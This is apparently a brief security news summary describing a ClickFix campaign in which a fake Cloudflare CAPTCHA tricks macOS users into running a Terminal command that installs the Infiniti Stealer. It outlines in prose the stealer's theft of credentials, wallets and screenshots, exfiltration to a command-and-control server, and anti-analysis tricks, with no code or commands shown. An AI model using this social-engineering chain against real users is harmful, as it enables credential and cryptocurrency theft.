A recent ClickFix campaign targets macOS users by delivering a Python-based information stealer, known as Infiniti Stealer, through a deceptive Cloudflare-themed verification page. This attack begins with a fake CAPTCHA prompting users to execute a command in Terminal. When the command is run, it fetches a Bash script from a remote server that downloads and executes the malware.
The Infiniti Stealer collects sensitive information such as browser credentials, cryptocurrency wallets, and screenshots, sending the data to a command-and-control server via HTTP POST requests. The malware employs techniques to evade detection, including randomized execution delays and checks for analysis environments. This adaptation of previously successful Windows attack methods highlights a growing threat to macOS users.